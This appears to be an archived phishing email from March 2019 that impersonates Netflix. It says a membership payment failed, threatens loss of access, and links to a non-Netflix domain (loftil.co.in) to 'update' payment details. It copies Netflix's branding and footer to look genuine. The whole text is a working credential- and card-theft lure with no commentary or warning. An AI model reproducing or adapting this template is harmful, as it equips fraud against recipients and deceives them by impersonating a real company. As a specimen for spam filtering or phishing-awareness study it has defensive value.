Update payment method now M7PA.87855-212673-8774-1477

service@netflix.com app126121478 at xxxxx.com
Sat Mar 2 06:39:31 UTC 2019

 	 Hi Dear Customer,
We weren't able to complete your last payment for your Netflix
membership. We'll try charging you again over the next couple of days,
but if we aren't able to complete a payment soon, you'll lose access to
Netflix.

Update payment method now
<https://loftil.co.in/accessadmin/resource/zebi/cigi_bin/>

 	 Need help? Contact support or visit our Help Center. Please do
not reply to this email.

View or make changes to your Netflix Red membership at any time. You'll
need a supported device and an Internet connection to stream videos or
to save videos to watch offline.

 	 ©2019 Netflix, LLC 901 Cherry Ave, San Bruno, CA 94066

You have received this mandatory email service announcement to update
you about important changes to your Netflix product or account. View
your email options in your Netflix account.